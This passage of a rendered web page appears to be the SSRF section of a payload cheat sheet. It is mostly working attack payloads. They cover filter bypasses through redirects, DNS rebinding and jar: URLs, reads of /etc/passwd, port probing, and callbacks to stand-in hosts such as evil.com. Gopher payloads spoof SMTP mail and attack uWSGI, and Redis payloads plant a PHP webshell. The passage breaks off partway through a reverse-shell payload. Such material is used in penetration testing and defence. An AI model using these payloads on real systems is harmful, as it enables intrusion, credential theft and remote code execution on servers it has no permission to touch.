<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="n">2</span><span class="p">.</span> <span class="n">Launch</span> <span class="n">the</span> <span class="n">SSRF</span> <span class="n">pointing</span> <span class="n">to</span> <span class="n">vulnerable</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">index</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">YOUR_SERVER_IP</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="n">vulnerable</span><span class="p">.</span><span class="n">com</span> <span class="n">will</span> <span class="n">fetch</span> <span class="n">YOUR_SERVER_IP</span> <span class="n">which</span> <span class="n">will</span> <span class="n">redirect</span> <span class="n">to</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-19-4" name="__codelineno-19-4" href="#__codelineno-19-4"></a><span class="n">3</span><span class="p">.</span> <span class="n">You</span> <span class="n">can</span> <span class="n">use</span> <span class="n">response</span> <span class="n">codes</span> <span class="p">[</span><span class="n">307</span><span class="p">](</span><span class="n">https</span><span class="p">://</span><span class="n">developer</span><span class="p">.</span><span class="n">mozilla</span><span class="p">.</span><span class="n">org</span><span class="p">/</span><span class="n">en-US</span><span class="p">/</span><span class="n">docs</span><span class="p">/</span><span class="n">Web</span><span class="p">/</span><span class="n">HTTP</span><span class="p">/</span><span class="n">Status</span><span class="p">/</span><span class="n">307</span><span class="p">)</span> <span class="n">and</span> <span class="p">[</span><span class="n">308</span><span class="p">](</span><span class="n">https</span><span class="p">://</span><span class="n">developer</span><span class="p">.</span><span class="n">mozilla</span><span class="p">.</span><span class="n">org</span><span class="p">/</span><span class="n">en-US</span><span class="p">/</span><span class="n">docs</span><span class="p">/</span><span class="n">Web</span><span class="p">/</span><span class="n">HTTP</span><span class="p">/</span><span class="n">Status</span><span class="p">/</span><span class="n">308</span><span class="p">)</span> <span class="k">in</span> <span class="n">order</span> <span class="n">to</span> <span class="n">retain</span> <span class="n">HTTP</span> <span class="n">method</span> <span class="n">and</span> <span class="n">body</span> <span class="n">after</span> <span class="n">the</span> <span class="n">redirection</span><span class="p">.</span>
</code></pre></div>
<h3 id="bypassing-using-typeurl">Bypassing using type=url</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="n">Change</span> <span class="s2">&quot;type=file&quot;</span> <span class="n">to</span> <span class="s2">&quot;type=url&quot;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="n">Paste</span> <span class="n">URL</span> <span class="k">in</span> <span class="n">text</span> <span class="n">field</span> <span class="n">and</span> <span class="n">hit</span> <span class="n">enter</span>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a><span class="n">Using</span> <span class="n">this</span> <span class="n">vulnerability</span> <span class="n">users</span> <span class="n">can</span> <span class="n">upload</span> <span class="n">images</span> <span class="n">from</span> <span class="n">any</span> <span class="n">image</span> <span class="n">URL</span> <span class="p">=</span> <span class="n">trigger</span> <span class="n">an</span> <span class="n">SSRF</span>
</code></pre></div>
<h3 id="bypassing-using-dns-rebinding-toctou">Bypassing using DNS Rebinding (TOCTOU)</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="n">Create</span> <span class="n">a</span> <span class="n">domain</span> <span class="n">that</span> <span class="n">change</span> <span class="n">between</span> <span class="n">two</span> <span class="n">IPs</span><span class="p">.</span> <span class="n">http</span><span class="p">://</span><span class="n">1u</span><span class="p">.</span><span class="n">ms</span><span class="p">/</span> <span class="n">exists</span> <span class="k">for</span> <span class="n">this</span> <span class="n">purpose</span><span class="p">.</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="k">For</span> <span class="n">example</span> <span class="n">to</span> <span class="n">rotate</span> <span class="n">between</span> <span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4</span> <span class="n">and</span> <span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">,</span> <span class="n">use</span> <span class="n">the</span> <span class="n">following</span> <span class="n">domain</span><span class="p">:</span>
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a><span class="n">make</span><span class="p">-</span><span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4-rebind</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254-rr</span><span class="p">.</span><span class="n">1u</span><span class="p">.</span><span class="n">ms</span>
</code></pre></div>
<h3 id="bypassing-using-jar-protocol-java-only">Bypassing using jar protocol (java only)</h3>
<p>Blind SSRF</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="n">jar</span><span class="p">:</span><span class="n">scheme</span><span class="p">://</span><span class="n">domain</span><span class="p">/</span><span class="n">path</span><span class="p">!/</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="n">jar</span><span class="p">:</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">!/</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a><span class="n">jar</span><span class="p">:</span><span class="n">https</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">!/</span>
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a><span class="n">jar</span><span class="p">:</span><span class="n">ftp</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">!/</span>
</code></pre></div>
<h2 id="ssrf-exploitation-via-url-scheme">SSRF exploitation via URL Scheme</h2>
<h3 id="file">File</h3>
<p>Allows an attacker to fetch the content of a file on the server</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="n">file</span><span class="p">://</span><span class="n">path</span><span class="p">/</span><span class="n">to</span><span class="p">/</span><span class="n">file</span>
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a><span class="n">file</span><span class="p">:///</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
<a id="__codelineno-23-3" name="__codelineno-23-3" href="#__codelineno-23-3"></a><span class="n">file</span><span class="p">://\/\/</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
<a id="__codelineno-23-4" name="__codelineno-23-4" href="#__codelineno-23-4"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">file</span><span class="p">:///</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
</code></pre></div>
<h3 id="http">HTTP</h3>
<p>Allows an attacker to fetch any content from the web, it can also be used to scan ports.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">22</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-24-3" name="__codelineno-24-3" href="#__codelineno-24-3"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">443</span>
</code></pre></div>
<p><img alt="SSRF stream" src="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true" /></p>
<p>The following URL scheme can be used to probe the network</p>
<h3 id="dict">Dict</h3>
<p>The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="n">dict</span><span class="p">://&lt;</span><span class="n">user</span><span class="p">&gt;;&lt;</span><span class="n">auth</span><span class="p">&gt;@&lt;</span><span class="n">host</span><span class="p">&gt;:&lt;</span><span class="n">port</span><span class="p">&gt;/</span><span class="n">d</span><span class="p">:&lt;</span><span class="n">word</span><span class="p">&gt;:&lt;</span><span class="n">database</span><span class="p">&gt;:&lt;</span><span class="n">n</span><span class="p">&gt;</span>
<a id="__codelineno-25-2" name="__codelineno-25-2" href="#__codelineno-25-2"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">attacker</span><span class="p">:</span><span class="n">11111</span><span class="p">/</span>
</code></pre></div>
<h3 id="sftp">SFTP</h3>
<p>A network protocol used for secure file transfer over secure shell</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">sftp</span><span class="p">://</span><span class="n">evil</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">11111</span><span class="p">/</span>
</code></pre></div>
<h3 id="tftp">TFTP</h3>
<p>Trivial File Transfer Protocol, works over UDP</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">tftp</span><span class="p">://</span><span class="n">evil</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">12346</span><span class="p">/</span><span class="n">TESTUDPPACKET</span>
</code></pre></div>
<h3 id="ldap">LDAP</h3>
<p>Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">ldap</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">11211</span><span class="p">/</span><span class="k">%</span><span class="n">0astats</span><span class="k">%</span><span class="n">0aquit</span>
</code></pre></div>
<h3 id="gopher">Gopher</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">25</span><span class="p">/</span><span class="n">xHELO</span><span class="k">%</span><span class="n">20localhost</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aMAIL</span><span class="k">%</span><span class="n">20FROM</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">3Chacker</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aRCPT</span><span class="k">%</span><span class="n">20TO</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">3Cvictim</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aDATA</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aFrom</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">5BHacker</span><span class="k">%</span><span class="n">5D</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">3Chacker</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aTo</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">3Cvictime</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aDate</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">20Tue</span><span class="k">%</span><span class="n">2C</span><span class="k">%</span><span class="n">2015</span><span class="k">%</span><span class="n">20Sep</span><span class="k">%</span><span class="n">202017</span><span class="k">%</span><span class="n">2017</span><span class="k">%</span><span class="n">3A20</span><span class="k">%</span><span class="n">3A26</span><span class="k">%</span><span class="n">20</span><span class="p">-</span><span class="n">0400</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aSubject</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">20AH</span><span class="k">%</span><span class="n">20AH</span><span class="k">%</span><span class="n">20AH</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aYou</span><span class="k">%</span><span class="n">20didn</span><span class="k">%</span><span class="n">27t</span><span class="k">%</span><span class="n">20say</span><span class="k">%</span><span class="n">20the</span><span class="k">%</span><span class="n">20magic</span><span class="k">%</span><span class="n">20word</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">21</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span><span class="p">.</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aQUIT</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a>
<a id="__codelineno-29-3" name="__codelineno-29-3" href="#__codelineno-29-3"></a><span class="n">will</span> <span class="n">make</span> <span class="n">a</span> <span class="n">request</span> <span class="n">like</span>
<a id="__codelineno-29-4" name="__codelineno-29-4" href="#__codelineno-29-4"></a><span class="n">HELO</span> <span class="n">localhost</span>
<a id="__codelineno-29-5" name="__codelineno-29-5" href="#__codelineno-29-5"></a><span class="n">MAIL</span> <span class="n">FROM</span><span class="p">:&lt;</span><span class="n">hacker</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="p">&gt;</span>
<a id="__codelineno-29-6" name="__codelineno-29-6" href="#__codelineno-29-6"></a><span class="n">RCPT</span> <span class="n">TO</span><span class="p">:&lt;</span><span class="n">victim</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="p">&gt;</span>
<a id="__codelineno-29-7" name="__codelineno-29-7" href="#__codelineno-29-7"></a><span class="n">DATA</span>
<a id="__codelineno-29-8" name="__codelineno-29-8" href="#__codelineno-29-8"></a><span class="n">From</span><span class="p">:</span> <span class="no">[Hacker]</span> <span class="p">&lt;</span><span class="n">hacker</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="p">&gt;</span>
<a id="__codelineno-29-9" name="__codelineno-29-9" href="#__codelineno-29-9"></a><span class="n">To</span><span class="p">:</span> <span class="p">&lt;</span><span class="n">victime</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="p">&gt;</span>
<a id="__codelineno-29-10" name="__codelineno-29-10" href="#__codelineno-29-10"></a><span class="n">Date</span><span class="p">:</span> <span class="n">Tue</span><span class="p">,</span> <span class="n">15</span> <span class="n">Sep</span> <span class="n">2017</span> <span class="n">17</span><span class="p">:</span><span class="n">20</span><span class="p">:</span><span class="n">26</span> <span class="p">-</span><span class="n">0400</span>
<a id="__codelineno-29-11" name="__codelineno-29-11" href="#__codelineno-29-11"></a><span class="n">Subject</span><span class="p">:</span> <span class="n">Ah</span> <span class="n">Ah</span> <span class="n">AH</span>
<a id="__codelineno-29-12" name="__codelineno-29-12" href="#__codelineno-29-12"></a>
<a id="__codelineno-29-13" name="__codelineno-29-13" href="#__codelineno-29-13"></a><span class="n">You</span> <span class="n">didn</span><span class="err">&#39;</span><span class="n">t</span> <span class="n">say</span> <span class="n">the</span> <span class="n">magic</span> <span class="n">word</span> <span class="p">!</span>
<a id="__codelineno-29-14" name="__codelineno-29-14" href="#__codelineno-29-14"></a>
<a id="__codelineno-29-15" name="__codelineno-29-15" href="#__codelineno-29-15"></a>
<a id="__codelineno-29-16" name="__codelineno-29-16" href="#__codelineno-29-16"></a><span class="p">.</span>
<a id="__codelineno-29-17" name="__codelineno-29-17" href="#__codelineno-29-17"></a><span class="n">QUIT</span>
</code></pre></div>
<h4 id="gopher-http">Gopher HTTP</h4>
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="n">gopher</span><span class="p">://&lt;</span><span class="n">proxyserver</span><span class="p">&gt;:</span><span class="n">8080</span><span class="p">/</span><span class="n">_GET</span> <span class="n">http</span><span class="p">://&lt;</span><span class="n">attacker</span><span class="p">:</span><span class="n">80</span><span class="p">&gt;/</span><span class="n">x</span> <span class="n">HTTP</span><span class="p">/</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="k">%</span><span class="n">0A</span><span class="k">%</span><span class="n">0A</span>
<a id="__codelineno-30-2" name="__codelineno-30-2" href="#__codelineno-30-2"></a><span class="n">gopher</span><span class="p">://&lt;</span><span class="n">proxyserver</span><span class="p">&gt;:</span><span class="n">8080</span><span class="p">/</span><span class="n">_POST</span><span class="k">%</span><span class="n">20http</span><span class="p">://&lt;</span><span class="n">attacker</span><span class="p">&gt;:</span><span class="n">80</span><span class="p">/</span><span class="n">x</span><span class="k">%</span><span class="n">20HTTP</span><span class="p">/</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="k">%</span><span class="n">0ACookie</span><span class="p">:</span><span class="k">%</span><span class="n">20eatme</span><span class="k">%</span><span class="n">0A</span><span class="k">%</span><span class="n">0AI</span><span class="p">+</span><span class="n">am</span><span class="p">+</span><span class="n">a</span><span class="p">+</span><span class="n">post</span><span class="p">+</span><span class="n">body</span>
</code></pre></div>
<h4 id="gopher-smtp-back-connect-to-1337">Gopher SMTP - Back connect to 1337</h4>
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a><span class="x">Content of evil.com/redirect.php:</span>
<a id="__codelineno-31-2" name="__codelineno-31-2" href="#__codelineno-31-2"></a><span class="cp">&lt;?php</span>
<a id="__codelineno-31-3" name="__codelineno-31-3" href="#__codelineno-31-3"></a><span class="nb">header</span><span class="p">(</span><span class="s2">&quot;Location: gopher://hack3r.site:1337/_SSRF%0ATest!&quot;</span><span class="p">);</span>
<a id="__codelineno-31-4" name="__codelineno-31-4" href="#__codelineno-31-4"></a><span class="cp">?&gt;</span>
<a id="__codelineno-31-5" name="__codelineno-31-5" href="#__codelineno-31-5"></a>
<a id="__codelineno-31-6" name="__codelineno-31-6" href="#__codelineno-31-6"></a><span class="x">Now query it.</span>
<a id="__codelineno-31-7" name="__codelineno-31-7" href="#__codelineno-31-7"></a><span class="x">https://example.com/?q=http://evil.com/redirect.php.</span>
</code></pre></div>
<h4 id="gopher-smtp-send-a-mail">Gopher SMTP - send a mail</h4>
<div class="highlight"><pre><span></span><code><a id="__codelineno-32-1" name="__codelineno-32-1" href="#__codelineno-32-1"></a><span class="x">Content of evil.com/redirect.php:</span>
<a id="__codelineno-32-2" name="__codelineno-32-2" href="#__codelineno-32-2"></a><span class="cp">&lt;?php</span>
<a id="__codelineno-32-3" name="__codelineno-32-3" href="#__codelineno-32-3"></a> <span class="nv">$commands</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span>
<a id="__codelineno-32-4" name="__codelineno-32-4" href="#__codelineno-32-4"></a> <span class="s1">&#39;HELO victim.com&#39;</span><span class="p">,</span>
<a id="__codelineno-32-5" name="__codelineno-32-5" href="#__codelineno-32-5"></a> <span class="s1">&#39;MAIL FROM: &lt;admin@victim.com&gt;&#39;</span><span class="p">,</span>
<a id="__codelineno-32-6" name="__codelineno-32-6" href="#__codelineno-32-6"></a> <span class="s1">&#39;RCPT To: &lt;sxcurity@oou.us&gt;&#39;</span><span class="p">,</span>
<a id="__codelineno-32-7" name="__codelineno-32-7" href="#__codelineno-32-7"></a> <span class="s1">&#39;DATA&#39;</span><span class="p">,</span>
<a id="__codelineno-32-8" name="__codelineno-32-8" href="#__codelineno-32-8"></a> <span class="s1">&#39;Subject: @sxcurity!&#39;</span><span class="p">,</span>
<a id="__codelineno-32-9" name="__codelineno-32-9" href="#__codelineno-32-9"></a> <span class="s1">&#39;Corben was here, woot woot!&#39;</span><span class="p">,</span>
<a id="__codelineno-32-10" name="__codelineno-32-10" href="#__codelineno-32-10"></a> <span class="s1">&#39;.&#39;</span>
<a id="__codelineno-32-11" name="__codelineno-32-11" href="#__codelineno-32-11"></a> <span class="p">);</span>
<a id="__codelineno-32-12" name="__codelineno-32-12" href="#__codelineno-32-12"></a>
<a id="__codelineno-32-13" name="__codelineno-32-13" href="#__codelineno-32-13"></a> <span class="nv">$payload</span> <span class="o">=</span> <span class="nb">implode</span><span class="p">(</span><span class="s1">&#39;%0A&#39;</span><span class="p">,</span> <span class="nv">$commands</span><span class="p">);</span>
<a id="__codelineno-32-14" name="__codelineno-32-14" href="#__codelineno-32-14"></a>
<a id="__codelineno-32-15" name="__codelineno-32-15" href="#__codelineno-32-15"></a> <span class="nb">header</span><span class="p">(</span><span class="s1">&#39;Location: gopher://0:25/_&#39;</span><span class="o">.</span><span class="nv">$payload</span><span class="p">);</span>
<a id="__codelineno-32-16" name="__codelineno-32-16" href="#__codelineno-32-16"></a><span class="cp">?&gt;</span>
</code></pre></div>
<h3 id="netdoc">Netdoc</h3>
<p>Wrapper for Java when your payloads struggle with "\n" and "\r" characters.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-33-1" name="__codelineno-33-1" href="#__codelineno-33-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">netdoc</span><span class="p">:///</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
</code></pre></div>
<h2 id="ssrf-exploiting-wsgi">SSRF exploiting WSGI</h2>
<p>Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-34-1" name="__codelineno-34-1" href="#__codelineno-34-1"></a><span class="n">gopher</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">8000</span><span class="p">/</span><span class="n">_</span><span class="k">%</span><span class="n">00</span><span class="k">%</span><span class="n">1A</span><span class="k">%</span><span class="n">00</span><span class="k">%</span><span class="n">00</span><span class="k">%</span><span class="n">0A</span><span class="k">%</span><span class="n">00UWSGI_FILE</span><span class="k">%</span><span class="n">0C</span><span class="k">%</span><span class="n">00</span><span class="p">/</span><span class="n">tmp</span><span class="p">/</span><span class="n">test</span><span class="p">.</span><span class="n">py</span>
</code></pre></div>
<table>
<thead>
<tr>
<th>Header</th>
<th></th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>modifier1</td>
<td>(1 byte)</td>
<td>0 (%00)</td>
</tr>
<tr>
<td>datasize</td>
<td>(2 bytes)</td>
<td>26 (%1A%00)</td>
</tr>
<tr>
<td>modifier2</td>
<td>(1 byte)</td>
<td>0 (%00)</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Variable (UWSGI_FILE)</th>
<th></th>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>key length</td>
<td>(2 bytes)</td>
<td>10</td>
<td>(%0A%00)</td>
<td></td>
</tr>
<tr>
<td>key data</td>
<td>(m bytes)</td>
<td></td>
<td>UWSGI_FILE</td>
<td></td>
</tr>
<tr>
<td>value length</td>
<td>(2 bytes)</td>
<td>12</td>
<td>(%0C%00)</td>
<td></td>
</tr>
<tr>
<td>value data</td>
<td>(n bytes)</td>
<td></td>
<td>/tmp/test.py</td>
<td></td>
</tr>
</tbody>
</table>
<h2 id="ssrf-exploiting-redis">SSRF exploiting Redis</h2>
<blockquote>
<p>Redis is a database system that stores everything in RAM</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-35-1" name="__codelineno-35-1" href="#__codelineno-35-1"></a><span class="c"># Getting a webshell</span>
<a id="__codelineno-35-2" name="__codelineno-35-2" href="#__codelineno-35-2"></a><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">CONFIG</span><span class="k">%</span><span class="n">20SET</span><span class="k">%</span><span class="n">20dir</span><span class="k">%</span><span class="n">20</span><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">www</span><span class="p">/</span><span class="n">html</span>
<a id="__codelineno-35-3" name="__codelineno-35-3" href="#__codelineno-35-3"></a><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">CONFIG</span><span class="k">%</span><span class="n">20SET</span><span class="k">%</span><span class="n">20dbfilename</span><span class="k">%</span><span class="n">20file</span><span class="p">.</span><span class="n">php</span>
<a id="__codelineno-35-4" name="__codelineno-35-4" href="#__codelineno-35-4"></a><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">SET</span><span class="k">%</span><span class="n">20mykey</span><span class="k">%</span><span class="n">20</span><span class="s2">&quot;&lt;\x3Fphp system($_GET[0])\x3F&gt;&quot;</span>
<a id="__codelineno-35-5" name="__codelineno-35-5" href="#__codelineno-35-5"></a><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">SAVE</span>
<a id="__codelineno-35-6" name="__codelineno-35-6" href="#__codelineno-35-6"></a>
<a id="__codelineno-35-7" name="__codelineno-35-7" href="#__codelineno-35-7"></a><span class="c"># Getting a PHP reverse shell</span>
<a id="__codelineno-35-8" name="__codelineno-35-8" href="#__codelineno-35-8"></a><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">_config</span><span class="k">%</span><span class="n">20set</span><span class="k">%</span><span class="n">20dir</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">2Fvar</span><span class="k">%</span><span class="n">2Fwww</span><span class="k">%</span><span class="n">2Fhtml</span>
<a id="__codelineno-35-9" name="__codelineno-35-9" href="#__codelineno-35-9"></a><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">_config</span><span class="k">%</span><span class="n">20set</span><span class="k">%</span><span class="n">20dbfilename</span><span class="k">%</span><span class="n">20reverse</span><span class="p">.</span><span class="n">php</span>
